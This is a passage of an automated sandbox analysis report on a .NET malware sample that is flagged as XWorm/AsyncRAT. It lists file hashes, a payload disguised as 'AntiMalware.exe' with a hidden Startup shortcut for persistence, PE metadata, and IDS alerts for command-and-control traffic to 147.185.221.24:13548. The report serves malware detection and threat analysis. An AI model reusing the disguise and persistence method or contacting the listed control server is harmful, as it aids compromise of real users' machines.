                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxkdls53.xh2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxzkruj5.4yz.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0vhzaq5.1i1.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lg0gvhjd.rc4.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1i122oc.uyz.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mphd4wvh.5x0.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4n533tf.3py.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_un0jwvdk.kyk.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10pnth0.i21.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyqgxk2g.chv.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoio1qx4.ie1.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Roaming\AntiMalware.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KJhsNv2RcI.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):70144
                                                                      Entropy (8bit):5.9583365203186345
                                                                      Encrypted:false
                                                                      SSDEEP:1536:VMYJzT65pX5Rc3+W0f60mbm2zHJ5+26YKg9Ot+whmT:6YJKv3/fQbmOEZOOt+wMT
                                                                      MD5:88EF3BC08129685BF8A1A238487B60EC
                                                                      SHA1:C313F0452D5906586E73534C9BBC94998211C733
                                                                      SHA-256:2BD38B201C0C2FD95FCDC6824CDCE1952AE7ED0B89F1EE52BE2A27341903318C
                                                                      SHA-512:4255D9A045F91AA28833607E1A988949D08444C257488522CD91BCDBE46841C976BEFF5B84713B1AE0CA00DD32813D3F43E70E91F4F61A388738F93CB7DF3E48
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 84%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PFdg.............................%... ...@....@.. ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......,]..........&.....................................................(....*.r...p*. .l..*..(....*.r#..p*. x...*.s.........s.........s.........s.........*.r...p*. ..t.*.r...p*. E/..*.rN..p*. %kU.*.r...p*. ....*.r...p*. t...*..((...*.rS..p*. ..^.*.r...p*. c...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*. ...*.r...p*. ...*.rG..p*. +...*.r...p*. ..}.*.r...p*. d...*.rr..p*. ~.H.*.r+..p*. ._..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AntiMalware.lnk

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KJhsNv2RcI.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 16:59:10 2024, mtime=Fri Dec 20 16:59:10 2024, atime=Fri Dec 20 16:59:10 2024, length=70144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):786
                                                                      Entropy (8bit):5.071059183519793
                                                                      Encrypted:false
                                                                      SSDEEP:12:8dJ+Plfh64R+WCF9gdY//Vm9uLRLlEalZlAjAJ1rrH/mZfsJUJ/BmV:8dJoltRpD+AGROoUAJ1rris2BBm
                                                                      MD5:2F001D89A0C79CE9AC6C35D4510DF2E6
                                                                      SHA1:4F73E28E8B28C322D38E9E6A9B189F0DDFD7140D
                                                                      SHA-256:D7C79A22179AE3C8F38FF650EC6F29DF346A80B7F8FE75FD674293D98BB1E098
                                                                      SHA-512:FE6395583358C69FC32F7D1EE2E4FF1B13A89547BC8295BA95CFD360903842788DA48E64247F3CFC14E3D8A3C9290B90B510419591DA0C35EED4AC13B0FEB9F9
                                                                      Malicious:false
                                                                      Preview:L..................F.... ....B...S..!.Y..S...B...S............................:..DG..Yr?.D..U..k0.&...&......vk.v....z.0..S...R^..S......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y=............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:..............................R.o.a.m.i.n.g.....l.2......Yf. .ANTIMA~1.EXE..P......Yf..Yf.....y.........................A.n.t.i.M.a.l.w.a.r.e...e.x.e.......]...............-.......\...........a........C:\Users\user\AppData\Roaming\AntiMalware.exe........\.....\.....\.....\.....\.A.n.t.i.M.a.l.w.a.r.e...e.x.e.`.......X.......210395...........hT..CrF.f4... .v.......,.......hT..CrF.f4... .v.......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):5.9583365203186345
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:KJhsNv2RcI.exe
                                                                      File size:70'144 bytes
                                                                      MD5:88ef3bc08129685bf8a1a238487b60ec
                                                                      SHA1:c313f0452d5906586e73534c9bbc94998211c733
                                                                      SHA256:2bd38b201c0c2fd95fcdc6824cdce1952ae7ed0b89f1ee52be2a27341903318c
                                                                      SHA512:4255d9a045f91aa28833607e1a988949d08444c257488522cd91bcdbe46841c976beff5b84713b1ae0ca00dd32813d3f43e70e91f4f61a388738f93cb7df3e48
                                                                      SSDEEP:1536:VMYJzT65pX5Rc3+W0f60mbm2zHJ5+26YKg9Ot+whmT:6YJKv3/fQbmOEZOOt+wMT
                                                                      TLSH:9F637C187BE64525F5FEAFB15DF17122CA7AB3235813DB5F24C8019A0B23A89CD413E9
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PFdg.............................%... ...@....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4125fe
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67644650 [Thu Dec 19 16:14:08 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x125ac0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4c6.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x106040x1080069d3f05400670779766ae2f645185030False0.6010446259469697data6.035783005301925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x140000x4c60x6002e3ce78f0f026b1cad35e8bc66237b7aFalse0.3743489583333333data3.7020300880486423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x160000xc0x20012fd375ac6a5a6606f965c860133bbabFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x140a00x23cdata0.4772727272727273
                                                                      RT_MANIFEST0x142dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-20T18:59:19.013621+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:25.458427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:25.471488+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449764147.185.221.2413548TCP
                                                                      2024-12-20T18:59:37.247017+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:37.267701+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449764147.185.221.2413548TCP
                                                                      2024-12-20T18:59:49.033343+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:49.284665+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:49.287104+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449764147.185.221.2413548TCP
                                                                      2024-12-20T18:59:55.335220+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T18:59:55.336096+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449764147.185.221.2413548TCP
                                                                      2024-12-20T19:00:19.021782+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:19.371204+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:19.723169+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:20.395198+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:21.743096+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:24.619212+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP
                                                                      2024-12-20T19:00:29.995913+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2413548192.168.2.449764TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 20, 2024 18:58:04.115508080 CET4973080192.168.2.4208.95.112.1
                                                                      Dec 20, 2024 18:58:04.235152960 CET8049730208.95.112.1192.168.2.4
                                                                      Dec 20, 2024 18:58:04.235292912 CET4973080192.168.2.4208.95.112.1
                                                                      Dec 20, 2024 18:58:04.236344099 CET4973080192.168.2.4208.95.112.1
                                                                      Dec 20, 2024 18:58:04.356187105 CET8049730208.95.112.1192.168.2.4
                                                                      Dec 20, 2024 18:58:05.389503956 CET8049730208.95.112.1192.168.2.4
                                                                      Dec 20, 2024 18:58:05.430418968 CET4973080192.168.2.4208.95.112.1
                                                                      Dec 20, 2024 18:58:50.560944080 CET8049730208.95.112.1192.168.2.4
                                                                      Dec 20, 2024 18:58:50.561008930 CET4973080192.168.2.4208.95.112.1
                                                                      Dec 20, 2024 18:59:12.790998936 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:12.910836935 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:12.911075115 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:13.095144033 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:13.215928078 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:19.013621092 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:19.071053982 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:24.902900934 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:25.022608995 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:25.458426952 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:25.471487999 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:25.591137886 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:28.705960989 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:28.758563042 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:28.795464993 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:28.915102005 CET1354849764147.185.221.24192.168.2.4
